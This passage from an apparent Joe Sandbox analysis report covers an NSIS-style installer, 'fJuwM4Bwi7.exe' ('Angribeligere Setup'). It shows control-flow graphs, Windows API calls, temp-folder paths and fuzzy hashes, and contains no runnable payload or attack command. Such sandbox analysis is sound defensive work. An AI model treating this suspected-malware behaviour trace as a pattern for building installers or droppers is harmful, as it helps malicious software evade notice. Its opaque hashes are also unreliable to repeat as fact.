405e7e-405e8a GetSystemDirectoryA 450->456 451->438 454 405f4c 451->454 452->436 458 405f13-405f19 call 405fa1 454->458 460 405e91-405e9f GetWindowsDirectoryA 455->460 461 405ef9-405efb 455->461 459 405efd-405f00 456->459 458->438 459->458 459->462 460->461 461->459 464 405ea1-405eab 461->464 462->458 467 405f08-405f0e lstrcatA 462->467 463->459 469 405ec5-405edb SHGetSpecialFolderLocation 464->469 470 405ead-405eb0 464->470 467->458 472 405ef6 469->472 473 405edd-405ef4 SHGetPathFromIDListA CoTaskMemFree 469->473 470->469 471 405eb2-405eb9 470->471 475 405ec1-405ec3 471->475 472->461 473->459 473->472 475->459 475->469
                                        APIs
                                        • GetVersion.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00000000,00405057,Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00000000), ref: 00405E09
                                        • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405E84
                                        • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405E97
                                        • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405ED3
                                        • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00405EE1
                                        • CoTaskMemFree.OLE32(00000000), ref: 00405EEC
                                        • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F0E
                                        • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00000000,00405057,Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00000000), ref: 00405F60
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                        • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$wi
                                        • API String ID: 900638850-831090937
                                        • Opcode ID: 4acb4603a534f03f61e1b5029561f8864cf9bf083dd2ad4547ff7456c33bf565
                                        • Instruction ID: 9c0e267699f90c8e910d98bdf84d4b8f2614ab6024826f89c9d009b20b1e8bc4
                                        • Opcode Fuzzy Hash: 4acb4603a534f03f61e1b5029561f8864cf9bf083dd2ad4547ff7456c33bf565
                                        • Instruction Fuzzy Hash: 10610571A04905ABDF215F64DC84B7B3BA8DB55304F10813BE641B62D1D33C4A42DF9E
                                        Function 004055F6 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 476 4055f6-40561c call 4058b4 479 405635-40563c 476->479 480 40561e-405630 DeleteFileA 476->480 482 40563e-405640 479->482 483 40564f-40565f call 405d36 479->483 481 4057bf-4057c3 480->481 484 405646-405649 482->484 485 40576d-405772 482->485 491 405661-40566c lstrcatA 483->491 492 40566e-40566f call 40580d 483->492 484->483 484->485 485->481 488 405774-405777 485->488 489 405781-405789 call 40603a 488->489 490 405779-40577f 488->490 489->481 499 40578b-40579f call 4057c6 call 4055ae 489->499 490->481 494 405674-405677 491->494 492->494 497 405682-405688 lstrcatA 494->497 498 405679-405680 494->498 500 40568d-4056ab lstrlenA FindFirstFileA 497->500 498->497 498->500 515 4057a1-4057a4 499->515 516 4057b7-4057ba call 40501f 499->516 502 4056b1-4056c8 call 4057f1 500->502 503 405763-405767 500->503 509 4056d3-4056d6 502->509 510 4056ca-4056ce 502->510 503->485 505 405769 503->505 505->485 513 4056d8-4056dd 509->513 514 4056e9-4056f7 call 405d36 509->514 510->509 512 4056d0 510->512 512->509 518 405742-405754 FindNextFileA 513->518 519 4056df-4056e1 513->519 526 4056f9-405701 514->526 527 40570e-405719 call 4055ae 514->527 515->490 521 4057a6-4057b5 call 40501f call 405bea 515->521 516->481 518->502 524 40575a-40575d FindClose 518->524 519->514 522 4056e3-4056e7 519->522 521->481 522->514 522->518 524->503 526->518 529 405703-40570c call 4055f6 526->529 535 40573a-40573d call 40501f 527->535 536 40571b-40571e 527->536 529->518 535->518 538 405720-405730 call 40501f call 405bea 536->538 539 405732-405738 536->539 538->518 539->518
                                        APIs
                                        • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,77462EE0,00000000), ref: 0040561F
                                        • lstrcatA.KERNEL32(00420D00,\*.*,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,77462EE0,00000000), ref: 00405667
                                        • lstrcatA.KERNEL32(?,00409014,?,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,77462EE0,00000000), ref: 00405688
                                        • lstrlenA.KERNEL32(?,?,00409014,?,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,77462EE0,00000000), ref: 0040568E
                                        • FindFirstFileA.KERNELBASE(00420D00,?,?,?,00409014,?,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,77462EE0,00000000), ref: 0040569F
                                        • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 0040574C
                                        • FindClose.KERNEL32(00000000), ref: 0040575D
                                        Strings
                                        • "C:\Users\user\Desktop\fJuwM4Bwi7.exe", xrefs: 004055F6
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405604
                                        • \*.*, xrefs: 00405661
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                        • String ID: "C:\Users\user\Desktop\fJuwM4Bwi7.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                        • API String ID: 2035342205-3313926952
                                        • Opcode ID: 25106c92b3c871bc14427ef9fb8c6b07d152e7746fae866eacc9b6d331f36872
                                        • Instruction ID: a1a18f6d4a87cf364f513f4d5348cf8987bf6841df45d5f239a42b9e89fe31fb
                                        • Opcode Fuzzy Hash: 25106c92b3c871bc14427ef9fb8c6b07d152e7746fae866eacc9b6d331f36872
                                        • Instruction Fuzzy Hash: 8051D230905A04FADB216B618C89BBF7AB8DF42714F54803BF445721D2D73C4942EE6E
                                        Function 00406310 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 743aa33a108d29f9cab5e819e308a9554fb8e98817c33194d1e30fb36f92eda3
                                        • Instruction ID: 49e2905b870d629617cd54a3ad4ea64d750052a334705c7e6b68d35cedeefd19
                                        • Opcode Fuzzy Hash: 743aa33a108d29f9cab5e819e308a9554fb8e98817c33194d1e30fb36f92eda3
                                        • Instruction Fuzzy Hash: 28F17970D00229CBCF28CFA8C8946ADBBB1FF45305F25856ED856BB281D3785A96CF45
                                        Function 00402036 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040208B
                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407374,?,?), ref: 00402143
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Classifies, xrefs: 004020CB
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: ByteCharCreateInstanceMultiWide
                                        • String ID: C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Classifies
                                        • API String ID: 123533781-1144022150
                                        • Opcode ID: 844d7db231ce930ba87aa91d55221135eb66824421c535283c4cff4e72d9e9e5
                                        • Instruction ID: 1053df79af30500630abfeafbcf843dcec04d0d4e3091bc204b5fde3a4f6985c
                                        • Opcode Fuzzy Hash: 844d7db231ce930ba87aa91d55221135eb66824421c535283c4cff4e72d9e9e5
                                        • Instruction Fuzzy Hash: 3B416D71A00209BFCB40EFA4CE88E9E7BB5BF48354B2042A9F911FB2D1D6799D41DB54
                                        Function 0040603A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileA.KERNELBASE(?,00421548,Invaliditetsprocent209\indoktrineringen.rec,004058F7,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,00000000,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,?,?,77462EE0,00405616,?,C:\Users\user\AppData\Local\Temp\,77462EE0), ref: 00406045
                                        • FindClose.KERNEL32(00000000), ref: 00406051
                                        Strings
                                        • Invaliditetsprocent209\indoktrineringen.rec, xrefs: 0040603A
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID: Invaliditetsprocent209\indoktrineringen.rec
                                        • API String ID: 2295610775-2173611331
                                        • Opcode ID: 1aa7e4dc1003f693668b82639e535814eeaefdc3a4332bebb0b1aa5890d42f5a
                                        • Instruction ID: ffb9975cce6792308ede9dbdbab0a2e32819aea082b360212a672f9e7c6ece7a
                                        • Opcode Fuzzy Hash: 1aa7e4dc1003f693668b82639e535814eeaefdc3a4332bebb0b1aa5890d42f5a
                                        • Instruction Fuzzy Hash: 7BD012319490306BC3106B787C0C85B7A599F573317118A33B56AF12F0C7389C7286ED
                                        Function 00406061 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000009), ref: 00406073
                                        • LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000009), ref: 0040607E
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0040608F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: AddressHandleLibraryLoadModuleProc
                                        • String ID:
                                        • API String ID: 310444273-0
                                        • Opcode ID: 14778026069da28af87b9950d589da7dca929d2a00fc8d83b3a738ce3464f0c4
                                        • Instruction ID: 2c1b19e4de550b622e70843c6ca25527790cfa0381149662c4593fbace01eca7
                                        • Opcode Fuzzy Hash: 14778026069da28af87b9950d589da7dca929d2a00fc8d83b3a738ce3464f0c4
                                        • Instruction Fuzzy Hash: 00E0C232A04211ABC321AB749D48D3B73ACAFD8751309493EF50AF6150D734AC21EBBA
                                        Function 00403B19 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 169 403b19-403b2b 170 403b31-403b37 169->170 171 403c6c-403c7b 169->171 170->171 172 403b3d-403b46 170->172 173 403cca-403cdf 171->173 174 403c7d-403cc5 GetDlgItem * 2 call 403fec SetClassLongA call 40140b 171->174 175 403b48-403b55 SetWindowPos 172->175 176 403b5b-403b5e 172->176 178 403ce1-403ce4 173->178 179 403d1f-403d24 call 404038 173->179 174->173 175->176 181 403b60-403b72 ShowWindow 176->181 182 403b78-403b7e 176->182 184 403ce6-403cf1 call 401389 178->184 185 403d17-403d19 178->185 187 403d29-403d44 179->187 181->182 188 403b80-403b95 DestroyWindow 182->188 189 403b9a-403b9d 182->189 184->185 200 403cf3-403d12 SendMessageA 184->200 185->179 186 403fb9 185->186 194 403fbb-403fc2 186->194 192 403d46-403d48 call 40140b 187->192 193 403d4d-403d53 187->193 195 403f96-403f9c 188->195 197 403bb0-403bb6 189->197 198 403b9f-403bab SetWindowLongA 189->198 192->193 203 403f77-403f90 DestroyWindow EndDialog 193->203 204 403d59-403d64 193->204 195->186 201 403f9e-403fa4 195->201 205 403c59-403c67 call 404053 197->205 206 403bbc-403bcd GetDlgItem 197->206 198->194 200->194 201->186 208 403fa6-403faf ShowWindow 201->208 203->195 204->203 209 403d6a-403db7 call 405d58 call 403fec * 3 GetDlgItem 204->209 205->194 210 403bec-403bef 206->210 211 403bcf-403be6 SendMessageA IsWindowEnabled 206->211 208->186 239 403dc1-403dfd ShowWindow KiUserCallbackDispatcher call 40400e EnableWindow 209->239 240 403db9-403dbe 209->240 212 403bf1-403bf2 210->212 213 403bf4-403bf7 210->213 211->186 211->210 216 403c22-403c27 call 403fc5 212->216 217 403c05-403c0a 213->217 218 403bf9-403bff 213->218 216->205 220 403c40-403c53 SendMessageA 217->220 222 403c0c-403c12 217->222 218->220 221 403c01-403c03 218->221 220->205 221->216 225 403c14-403c1a call 40140b 222->225 226 403c29-403c32 call 40140b 222->226 237 403c20 225->237 226->205 235 403c34-403c3e 226->235 235->237 237->216 243 403e02 239->243 244 403dff-403e00 239->244 240->239 245 403e04-403e32 GetSystemMenu EnableMenuItem SendMessageA 243->245 244->245 246 403e34-403e45 SendMessageA 245->246 247 403e47 245->247 248 403e4d-403e86 call 404021 call 405d36 lstrlenA call 405d58 SetWindowTextA call 401389 246->248 247->248 248->187 257 403e8c-403e8e 248->257 257->187 258 403e94-403e98 257->258 259 403eb7-403ecb DestroyWindow 258->259 260 403e9a-403ea0 258->260 259->195 262 403ed1-403efe CreateDialogParamA 259->262 260->186 261 403ea6-403eac 260->261 261->187 263 403eb2 261->263 262->195 264 403f04-403f5b call 403fec GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 262->264 263->186 264->186 269 403f5d-403f70 ShowWindow call 404038 264->269 271 403f75 269->271 271->195
                                        APIs
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B55
                                        • ShowWindow.USER32(?), ref: 00403B72
                                        • DestroyWindow.USER32 ref: 00403B86
                                        • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BA2
                                        • GetDlgItem.USER32(?,?), ref: 00403BC3
                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BD7
                                        • IsWindowEnabled.USER32(00000000), ref: 00403BDE
                                        • GetDlgItem.USER32(?,00000001), ref: 00403C8C
                                        • GetDlgItem.USER32(?,00000002), ref: 00403C96
                                        • SetClassLongA.USER32(?,000000F2,?), ref: 00403CB0
                                        • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D01
                                        • GetDlgItem.USER32(?,00000003), ref: 00403DA7
                                        • ShowWindow.USER32(00000000,?), ref: 00403DC8
                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403DDA
                                        • EnableWindow.USER32(?,?), ref: 00403DF5
                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E0B
                                        • EnableMenuItem.USER32(00000000), ref: 00403E12
                                        • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E2A
                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E3D
                                        • lstrlenA.KERNEL32(Angribeligere Setup: Installing,?,Angribeligere Setup: Installing,00422F00), ref: 00403E66
                                        • SetWindowTextA.USER32(?,Angribeligere Setup: Installing), ref: 00403E75
                                        • ShowWindow.USER32(?,0000000A), ref: 00403FA9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                        • String ID: Angribeligere Setup: Installing
                                        • API String ID: 3282139019-2219571644
                                        • Opcode ID: ee793e9f516e2da13c3aa51fc91f44a41e00c2883a64dc2cf2643230f3a9d64a
                                        • Instruction ID: 1f8690e76de68066656ca8d54ad2d010e53819933bf2384d883f7e4ba9537b83
                                        • Opcode Fuzzy Hash: ee793e9f516e2da13c3aa51fc91f44a41e00c2883a64dc2cf2643230f3a9d64a
                                        • Instruction Fuzzy Hash: 17C1C071A04205BBDB21AF21ED48D2B7EBCFB44706F40443EF601B11E1C7799942AB6E
                                        Function 00403787 Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 216stringregistrylibraryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 272 403787-40379f call 406061 275 4037a1-4037b1 call 405c94 272->275 276 4037b3-4037e4 call 405c1d 272->276 284 403807-403830 call 403a4c call 4058b4 275->284 280 4037e6-4037f7 call 405c1d 276->280 281 4037fc-403802 lstrcatA 276->281 280->281 281->284 290 403836-40383b 284->290 291 4038b7-4038bf call 4058b4 284->291 290->291 292 40383d-403861 call 405c1d 290->292 296 4038c1-4038c8 call 405d58 291->296 297 4038cd-4038f2 LoadImageA 291->297 292->291 302 403863-403865 292->302 296->297 300 403973-40397b call 40140b 297->300 301 4038f4-403924 RegisterClassA 297->301 315 403985-403990 call 403a4c 300->315 316 40397d-403980 300->316 305 403a42 301->305 306 40392a-40396e SystemParametersInfoA CreateWindowExA 301->306 303 403876-403882 lstrlenA 302->303 304 403867-403874 call 4057f1 302->304 309 403884-403892 lstrcmpiA 303->309 310 4038aa-4038b2 call 4057c6 call 405d36 303->310 304->303 312 403a44-403a4b 305->312 306->300 309->310 314 403894-40389e GetFileAttributesA 309->314 310->291 318 4038a0-4038a2 314->318 319 4038a4-4038a5 call 40580d 314->319 325 403996-4039b3 ShowWindow LoadLibraryA 315->325 326 403a19-403a1a call 4050f1 315->326 316->312 318->310 318->319 319->310 328 4039b5-4039ba LoadLibraryA 325->328 329 4039bc-4039ce GetClassInfoA 325->329 330 403a1f-403a21 326->330 328->329 331 4039d0-4039e0 GetClassInfoA RegisterClassA 329->331 332 4039e6-403a09 DialogBoxParamA call 40140b 329->332 334 403a23-403a29 330->334 335 403a3b-403a3d call 40140b 330->335 331->332 336 403a0e-403a17 call 4036d7 332->336 334->316 337 403a2f-403a36 call 40140b 334->337 335->305 336->312 337->316
                                        APIs
                                          • Part of subcall function 00406061: GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000009), ref: 00406073
                                          • Part of subcall function 00406061: LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000009), ref: 0040607E
                                          • Part of subcall function 00406061: GetProcAddress.KERNEL32(00000000,?), ref: 0040608F
                                        • lstrcatA.KERNEL32(1033,Angribeligere Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Angribeligere Setup: Installing,00000000,00000002,C:\Users\user\AppData\Local\Temp\,77463410,"C:\Users\user\Desktop\fJuwM4Bwi7.exe",00000000), ref: 00403802
                                        • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\terephthalate\edderdun,1033,Angribeligere Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Angribeligere Setup: Installing,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403877
                                        • lstrcmpiA.KERNEL32(?,.exe), ref: 0040388A
                                        • GetFileAttributesA.KERNEL32(Call), ref: 00403895
                                        • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\terephthalate\edderdun), ref: 004038DE
                                          • Part of subcall function 00405C94: wsprintfA.USER32 ref: 00405CA1
                                        • RegisterClassA.USER32(00422EA0), ref: 0040391B
                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403933
                                        • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403968
                                        • ShowWindow.USER32(00000005,00000000), ref: 0040399E
                                        • LoadLibraryA.KERNELBASE(RichEd20), ref: 004039AF
                                        • LoadLibraryA.KERNEL32(RichEd32), ref: 004039BA
                                        • GetClassInfoA.USER32(00000000,RichEdit20A,00422EA0), ref: 004039CA
                                        • GetClassInfoA.USER32(00000000,RichEdit,00422EA0), ref: 004039D7
                                        • RegisterClassA.USER32(00422EA0), ref: 004039E0
                                        • DialogBoxParamA.USER32(?,00000000,00403B19,00000000), ref: 004039FF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: "C:\Users\user\Desktop\fJuwM4Bwi7.exe"$.DEFAULT\Control Panel\International$.exe$1033$Angribeligere Setup: Installing$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\terephthalate\edderdun$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                        • API String ID: 914957316-2782496506
                                        • Opcode ID: d69af52eae453a52e03acfe7140820e929eba722ac2574cb4842baacd9f3a248
                                        • Instruction ID: 361ceaa5e45529a70bb989737ed67fdedcb7c759bf8cf29c3cde223c60b7be46
                                        • Opcode Fuzzy Hash: d69af52eae453a52e03acfe7140820e929eba722ac2574cb4842baacd9f3a248
                                        • Instruction Fuzzy Hash: E661E6B16442007EE720AF659D45F273E6CEB8475AF40407FF941B22E2D67C9D02DA6E
                                        Function 00402C79 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
